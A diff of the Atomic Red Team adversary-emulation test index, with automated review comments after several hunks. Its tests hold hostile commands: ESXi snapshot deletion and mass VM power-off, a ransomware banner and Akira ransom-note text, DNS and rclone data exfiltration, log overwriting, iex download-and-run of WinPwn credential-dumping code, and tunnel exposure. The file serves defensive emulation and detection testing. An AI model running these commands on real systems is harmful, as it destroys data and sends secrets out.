command: 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
/v TimeZoneKeyName
'
name: command_prompt
elevation_required: false
resource-development:
T1583:
technique:
@@ -113615,7 +114752,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -113633,7 +114770,41 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
identifier: T1595.003
atomic_tests:
- name: Web Server Wordlist Scan
auto_generated_guid: 89a83c3e-0b39-4c80-99f5-c2aa084098bd
description: 'This test will scan a target system with a wordlist of common
directories and file paths.
'
supported_platforms:
- windows
- linux
- macos
input_arguments:
target:
description: The target system to scan
type: string
default: http://localhost
wordlist:
description: The wordlist to use for scanning
type: path
default: PathToAtomicsFolder/T1595.003/src/wordlist.txt
request_timeout:
description: The timeout for each request (in seconds)
type: integer
default: 5
output_file:
description: File to output results to
type: string
default: "$env:TMPDIR/wordlist_scan.txt"
executor:
command: |
Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
Write-Host "Scan complete. Results saved to: #{output_file}"
name: powershell
T1591.004:
technique:
x_mitre_platforms:
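Review bot: `request_timeout` is declared `type: integer` but is passed quoted (`-Timeout "#{request_timeout}"`), so `Invoke-WordlistScan` receives a string; pass it unquoted or make sure the function's parameter is typed `[int]` so PowerShell coerces it. The `output_file` default `$env:TMPDIR/wordlist_scan.txt` has the same cross-platform problem as the T1526 cloud tests in this diff: TMPDIR is unset on Windows, which is the first listed platform, so the file lands at the drive root; `[IO.Path]::GetTempPath()` works on all three. Also add a `cleanup_command` that removes the output file and an "Upon execution, ..." line to the description, as the other tests in this file do.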
@@ -115479,6 +116650,48 @@ impact:
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
name: powershell
elevation_required: true
- name: ESXi - Change Welcome Message on Direct Console User Interface (DCUI)
auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810
description: |
Changes the ESXi welcome message to potentially display ransom information.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#change%20display%20information)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli system welcomemsg set -m ''RANSOMWARE-NOTIFICATION''"
'
name: command_prompt
elevation_required: false
T1496.004:
technique:
modified: '2024-10-16T17:59:27.535Z'
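Review bot: this test changes the DCUI welcome message but has no `cleanup_command`, so the `RANSOMWARE-NOTIFICATION` banner stays on the host after the run; add a cleanup that runs `esxcli system welcomemsg set -m ''` (or restores a message captured beforehand with `esxcli system welcomemsg get`) through the same plink invocation. The `vm_user` description repeats the "privilege user account" typo from the other ESXi tests; "privileged user account".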
@@ -116386,7 +117599,9 @@ impact:
type: path
default: "$env:temp\\test.txt"
dependencies:
- description: 'GPG must exist at (#{GPG_Exe_Location})
- description: 'GPG must exist at (#{GPG_Exe_Location}). If -GetPrereqs fails,
try to install GPG4WIN manually at ''https://www.gpg4win.org/download.html''.
Once done, run -CheckPrereqs to confirm that it works.
'
prereq_command: 'if (test-path ''#{GPG_Exe_Location}''){exit 0} else {exit
@@ -116394,19 +117609,19 @@ impact:
'
get_prereq_command: |
Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text" # Create the test.txt file
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe"
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S
executor:
name: powershell
elevation_required: false
command: 'cmd /c ''#{GPG_Exe_Location}'' -c ''#{File_to_Encrypt_Location}''
'
cleanup_command: 'remove-item ''#{File_to_Encrypt_Location}.gpg'' -force -erroraction
silentlycontinue | out-null
'
command: |
Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text" # Create the test.txt file again in case prereqs failed
cmd /c "`"C:\Program Files (x86)\GnuPG\bin\gpg.exe`" --passphrase 'SomeParaphraseBlah' --batch --yes -c `"#{File_to_Encrypt_Location}`""
cleanup_command: |
Remove-Item -Path "#{File_to_Encrypt_Location}" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "#{File_to_Encrypt_Location}.gpg" -Force -ErrorAction SilentlyContinue
- name: Data Encrypt Using DiskCryptor
auto_generated_guid: 44b68e11-9da2-4d45-a0d9-893dabd60f30
description: 'DiskCryptor, an open source encryption utility, can be exploited
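Review bot: the rewritten `command:` hard-codes `C:\Program Files (x86)\GnuPG\bin\gpg.exe` instead of using `#{GPG_Exe_Location}`, so the `GPG_Exe_Location` input argument and the `prereq_command` that tests that path no longer govern what actually runs; a user who points the argument at a 64-bit or portable GnuPG passes the prereq check and then fails at execution. Use `` `"#{GPG_Exe_Location}`" `` inside the `cmd /c` string, as the old command did. Minor: the passphrase literal reads "SomeParaphraseBlah"; "Passphrase" is presumably intended.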
@@ -116475,7 +117690,7 @@ impact:
echo "If you' re indeed interested in our assistance and the services we provide you can reach out to us following simple instructions:" >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "1. Install TOR Browser to get access to our chat room - https://www.torproject.org/download/." >> $env:Userprofile\Desktop\akira_readme.txt
echo "2. Paste this link https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
echo "2. Paste this link - https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
echo "3. Use this code - - to log into our chat." >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "Keep in mind that the faster you will get in touch, the less damage we cause" >> $env:Userprofile\Desktop\akira_readme.txt
@@ -116944,10 +118159,53 @@ impact:
prereq_command: 'stat "$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate"
'
get_prereq_command: |-
get_prereq_command: |
cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
terraform init
terraform apply -auto-approve
- name: ESXi - Delete VM Snapshots
auto_generated_guid: 1207ddff-f25b-41b3-aa0e-7c26d2b546d1
description: |
Deletes all snapshots for all Virtual Machines on an ESXi Host
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk ''NR>1 {print
$1}''`; do vim-cmd vmsvc/snapshot.removeall $i & done"
'
name: command_prompt
elevation_required: false
T1498:
technique:
modified: '2024-10-15T16:01:00.510Z'
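Review bot: `vim-cmd vmsvc/snapshot.removeall $i &` backgrounds each removal, so the SSH command (and the atomic) returns before the snapshots are actually deleted and any failure is never reported; drop the `&` or add `wait` after the loop so the exit status reflects the result. The test is also irreversible for every VM on the host and ships without a `cleanup_command` (deleted snapshots cannot be recreated), so the description should state that it is destructive and meant only for a disposable lab ESXi host.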
@@ -117820,6 +119078,49 @@ impact:
'
name: command_prompt
elevation_required: false
- name: ESXi - vim-cmd Used to Power Off VMs
auto_generated_guid: 622cc1a0-45e7-428c-aed7-c96dd605fbe6
description: |
Adversaries may power off VMs to facilitate the deployment of ransomware payloads.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#power%20off%20vm)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk ''NR>1 {print
$1}''`; do vim-cmd vmsvc/power.off $i & done"
'
name: command_prompt
elevation_required: false
initial-access:
T1133:
technique:
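Review bot: the same `-batch` host-key caveat as in the snapshot test applies to this `power.off` executor: without a cached or `-hostkey`-pinned ESXi key, plink exits before any `vim-cmd vmsvc/power.off` is issued. The loop powers off every VM the account can list, so the description should say so explicitly so readers point `vm_host` at a lab host. `vm_user` again says `privilege user account` where `privileged` is meant.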
@@ -119956,7 +121257,6 @@ initial-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
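Review bot: dropping the `$S3cur3Th1sSh1t_repo=...` assignment is safe; nothing left in the command references the variable, because the `iex(new-object net.webclient).downloadstring(...)` line already carries the full commit-pinned URL. The identical removal in the `safedump` variant in the next hunk is fine for the same reason.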
@@ -119968,7 +121268,6 @@ initial-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
@@ -121122,7 +122421,7 @@ exfiltration:
description: Set to '-b32' to use base32 encoding of data. Might be required
by some DNS resolvers.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'DNSExfiltrator powershell file must exist on disk at specified
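Review bot: the old and new `default:` lines for the `encoding` argument are indistinguishable here, so this is a whitespace-only change; whichever form survives, a bare `default:` is YAML null rather than an empty string, and since the description documents the argument as optional (`Set to '-b32' ...`), an explicit `default: ''` states the intent and guarantees `#{encoding}` substitutes to nothing instead of a null marker.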
@@ -121140,6 +122439,45 @@ exfiltration:
Import-Module "#{ps_module}"
Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
name: powershell
- name: Exfiltrate Data using DNS Queries via dig
auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
description: "This test demonstrates how an attacker can exfiltrate sensitive
information by encoding it as a subdomain (using base64 encoding) and \nmaking
DNS queries via the dig command to a controlled DNS server.\n"
supported_platforms:
- macos
- linux
input_arguments:
dns_port:
type: integer
default: '53'
description: Attacker's DNS server port
attacker_dns_server:
type: string
default: 8.8.8.8
description: Attacker's DNS server address
secret_info:
type: string
default: this is a secret info
description: secret info that will be exfiltirated
dependency_executor_name: bash
dependencies:
- description: dig command
prereq_command: which dig
get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
|| which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
&& sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
update && brew install --quiet bind
'
executor:
command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
| base64).google.com
'
name: bash
elevation_required: false
T1052.001:
technique:
x_mitre_platforms:
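Review bot: the `attacker_dns_server` default of `8.8.8.8` contradicts the description's "controlled DNS server": the executor `dig @8.8.8.8 -p 53 <base64>.google.com` hands the encoded `secret_info` to a public resolver, which forwards it to Google's authoritative servers, so a default run leaks the test string to third parties rather than to a lab listener. Default to a loopback placeholder such as `127.0.0.1` (paired with `dns_port`) or leave the argument without a default. Two smaller issues in the same executor: `echo ... | base64` emits `=` padding, `+` and `/`, and GNU `base64` wraps at 76 columns, none of which are valid in a hostname, so anything longer than the default secret yields a malformed query name (`| tr -d '\n='` helps, or use base32 as the neighbouring DNSExfiltrator test's `-b32` option does); and `dns_port` is `type: integer` but `default: '53'` is a quoted string. Typo in the `secret_info` description: `exfiltirated`.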
@@ -121371,6 +122709,132 @@ exfiltration:
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\T1567.002" -recurse -force
name: powershell
elevation_required: false
- name: Exfiltrate data with rclone to cloud Storage - AWS S3
auto_generated_guid: a4b74723-5cee-4300-91c3-5e34166909b4
description: |
This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
supported_platforms:
- linux
- macos
input_arguments:
rclone_path:
description: Directory of rclone.exe
type: path
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/
exfil_directory:
description: Directory to exfiltrate
type: string
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/
terraform_path:
description: Directory of terraform
type: path
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*
aws_access_key:
description: AWS Access Key
type: string
default: ''
aws_secret_key:
description: AWS Secret Key
type: string
default: ''
aws_region:
description: AWS Region
type: string
default: us-east-1
aws_profile:
description: AWS Profile
type: string
default: default
dependency_executor_name: powershell
dependencies:
- description: 'rclone must exist at (#{rclone_path})
'
prereq_command: 'if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
} elseif ($operatingSystem -match "linux") {
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
- description: terraform must exist at (#{terraform_path})
prereq_command: 'if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
} elseif ($operatingSystem -match "linux") {
Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
- description: 'Must provide a valid directory or file path to exfiltrate to
AWS S3
'
prereq_command: 'if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
foreach($fileSuffix in 1..10) {
Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
}
executor:
command: |
Write-Host "Deploying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
Write-Host "Generating rclone config... " -NoNewLine
$config = @"
[exfils3]
type = s3
provider = AWS
env_auth = true
region = #{aws_region}
"@
$config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
Write-Host "Done!"
Write-Host "Exfiltrating data... " -NoNewLine
$bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
$null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
Write-Host "Done!"
cleanup_command: |
Write-Host "Destroying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
name: powershell
elevation_required: false
T1030:
technique:
x_mitre_platforms:
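Review bot: `rclone_path`, `terraform_path` and `exfil_directory` are declared as input arguments but the executor never interpolates them: every `terraform init`/`apply`/`output`/`destroy` call and the `cd ... rclone-v*` line hardcode `PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/...` and `rclone-v*`, and the `rclone copy` source is the literal `.../T1567.002/data/` rather than `#{exfil_directory}`, so overriding any of the three at run time changes the prereq checks but not what is uploaded. Substitute `#{exfil_directory}` into the `rclone copy` line and the two tool paths elsewhere; since the prereq extracts Terraform into the fixed `terraform-v1.10.5/` directory the wildcard in the command position is unnecessary anyway, and worth verifying, because PowerShell expands wildcards for `Set-Location` and `Test-Path` but not for the command being invoked (wrap in `Resolve-Path` if it must stay). Also the `rclone_path` description says `rclone.exe` on a test whose `supported_platforms` are only linux and macos, `exfil_directory` is `type: string` where the sibling arguments use `path`, and the executor `cd`s into `PathToAtomicsFolder/T1567.002/src/` for a Terraform configuration (with a `bucket` output and `aws_region` variable) that does not appear in this diff; confirm those `.tf` files are part of the PR.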
@@ -121830,11 +123294,11 @@ exfiltration:
username:
description: Username for FTP server login
type: string
default:
default:
password:
description: Password for FTP server login
type: string
default:
default:
executor:
command: |
$Dir_to_copy = "$env:windir\temp"
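Review bot: as with the `encoding` default earlier in this file, the before and after `default:` lines for `username` and `password` render identically, so this is a whitespace-only change; for two required FTP login fields a bare `default:` is YAML null, and an explicit `default: ''` makes the "must be supplied" intent clearer to the runner and to readers.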
+458 -60
@@ -3317,7 +3317,7 @@ defense-evasion:
executor:
command: |
cat /dev/null > /var/log/messages #truncating the file to zero bytes
cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)
cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: Overwrite FreeBSD system log via echo utility
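Review bot: the path correction from `/var/lol/messages` to `/var/log/messages` is right, but the corrected line `cat /dev/zero > /var/log/messages` does not do what its comment claims (`log file filled with null bytes`): `/dev/zero` is unbounded, so `cat` keeps writing until the filesystem holding `/var/log` is full and then fails with ENOSPC, which can disrupt the test host. Bound the write, for example `head -c 1M /dev/zero > /var/log/messages` or `dd if=/dev/zero of=/var/log/messages bs=1k count=1024`, and adjust the comment; note the preceding `cat /dev/null > /var/log/messages` already truncates the file.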
@@ -4953,7 +4953,7 @@ defense-evasion:
text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()),
key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command,
key); subprocess.call(exec, shell=True)'''
cleanup_command:
cleanup_command:
name: bash
elevation_required: false
T1562:
@@ -6950,7 +6950,7 @@ defense-evasion:
iptables NOT installed *****\n"; exit 1; fi
'
get_prereq_command: 'echo ""
get_prereq_command: 'sudo apt-get install iptables
'
executor:
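Review bot: replacing the no-op `echo ""` with `sudo apt-get install iptables` is the right direction, but without `-y` the new `get_prereq_command` blocks on apt's confirmation prompt when run non-interactively, and it only covers Debian-derived hosts even though the check above reports `iptables NOT installed` on any distribution. Follow the pattern the dig and nmap tests in this change use: `(which apt-get && sudo apt-get install -y iptables) || (which yum && sudo yum install -y iptables) || (which dnf && sudo dnf install -y iptables)`.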
@@ -30678,7 +30678,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -30730,6 +30730,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -32070,7 +32071,7 @@ execution:
- linux
executor:
command: busybox sh &
cleanup_command:
cleanup_command:
name: sh
elevation_required: false
- name: emacs spawning an interactive system shell
@@ -32738,6 +32739,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -32913,6 +32915,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -44933,7 +44936,125 @@ command-and-control:
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
identifier: T1572
atomic_tests: []
atomic_tests:
- name: Microsoft Dev tunnels (Linux/macOS)
auto_generated_guid: 9f94a112-1ce2-464d-a63b-83c1f465f801
description: |
Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels.
This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc.
Reference:
- [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
supported_platforms:
- linux
- macos
input_arguments:
port:
description: port number for tunnel
type: integer
default: 8080
download_url:
description: link to download devtunnel
type: string
default: https://aka.ms/TunnelsCliDownload/linux-x64
binary_path:
description: path to download devtunnel
type: string
default: PathToAtomicsFolder/../ExternalPayloads/devtunnel
dependencies:
- description: 'Download devtunnel
'
prereq_command: 'test -f #{binary_path}
'
get_prereq_command: |
mkdir -p $(dirname #{binary_path})
curl -L "#{download_url}" -o "#{binary_path}"
chmod +x #{binary_path}
- description: 'Login to Microsoft Dev tunnels
'
prereq_command: '#{binary_path} user show | grep -q "Not logged in" && exit
1 || exit 0
'
get_prereq_command: 'echo "Login to devtunnel using the following command:
#{binary_path} user login"
'
executor:
command: "#{binary_path} host -p #{port} &\n"
cleanup_command: |
pkill -9 $(basename "#{binary_path}")
#{binary_path} user logout
rm #{binary_path}
name: bash
- name: VSCode tunnels (Linux/macOS)
auto_generated_guid: b877943f-0377-44f4-8477-f79db7f07c4d
description: |
Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet.
This atomic will generate a dev tunnel binding it to the local service running on the provided port.
Reference:
- [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
supported_platforms:
- linux
- macos
input_arguments:
artifact_base_url:
description: Base URL to download code-cli
type: string
default: https://code.visualstudio.com/sha/download
artifact_build:
description: build to download - Allowed values (stable/insiders)
type: string
default: stable
payload_path:
description: path to download code-cli
type: string
default: PathToAtomicsFolder/../ExternalPayloads
additional_args:
description: additional arguments to pass to code tunnel
type: string
default: ''
dependencies:
- description: 'Install code-cli
'
prereq_command: 'which code
'
get_prereq_command: "ARCH_SUFFIX=$(uname -m | grep -q \"arm64\\|aarch64\"
&& echo \"arm64\" || echo \"x64\")\nif [ \"$(uname)\" = \"Darwin\" ]\nthen
brew install code-cli\nelif [ \"$(expr substr $(uname) 1 5)\" = \"Linux\"
]\nthen mkdir -p $(dirname #{payload_path}) \n PKG_TYPE=$(command
-v apt >/dev/null && echo \"deb\" || echo \"rpm\")\n curl -L \"#{artifact_base_url}?build=#{artifact_build}&os=linux-${PKG_TYPE}-${ARCH_SUFFIX}\"
-o \"#{payload_path}/code.${PKG_TYPE}\"\n (which apt && apt install -y
\"#{payload_path}/code.${PKG_TYPE}\") || (which yum && yum install -y \"#{payload_path}/code.${PKG_TYPE}\")\n
\ rm \"#{payload_path}/code.${PKG_TYPE}\"\nfi\n"
- description: 'Login to VSCode Dev tunnels
'
prereq_command: 'code tunnel user show | grep -q "not logged in" && exit 1
|| exit 0
'
get_prereq_command: 'echo "Login to code tunnel using the following command:
code tunnel user login"
'
executor:
command: 'nohup code tunnel --accept-server-license-terms #{additional_args}
>/dev/null 2>&1 &
'
cleanup_command: |
pkill -9 tunnel
code tunnel unregister
code tunnel user logout
name: sh
T1071.003:
technique:
modified: '2024-04-16T12:28:59.928Z'
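Review bot: the Dev tunnels test lists `macos` under `supported_platforms`, but `download_url` defaults to `https://aka.ms/TunnelsCliDownload/linux-x64` and the prereq simply `curl`s it, so on macOS (and on arm64 Linux) the fetched binary will not execute and the `user show` prereq fails with an unhelpful error. Derive the URL from `uname -s`/`uname -m` in `get_prereq_command`, the way the VSCode test below computes `ARCH_SUFFIX`, or drop `macos` from the list. In the VSCode test, the `apt install -y`/`yum install -y` calls run without `sudo`, unlike the dig test in this same change, so they fail for a non-root user; and the cleanup `pkill -9 tunnel` matches on process name, so it would catch a still-running `devtunnel` host from the previous test but not necessarily the `code` CLI process itself (`pkill -9 -f "code tunnel"` matches the full command line). Neither test declares `elevation_required`; an explicit `false` keeps them consistent with the rest of the index.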
@@ -46014,7 +46135,34 @@ command-and-control:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1095
atomic_tests: []
atomic_tests:
- name: Linux ICMP Reverse Shell using icmp-cnc
auto_generated_guid: 8e139e1f-1f3a-4be7-901d-afae9738c064
description: |
ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems.
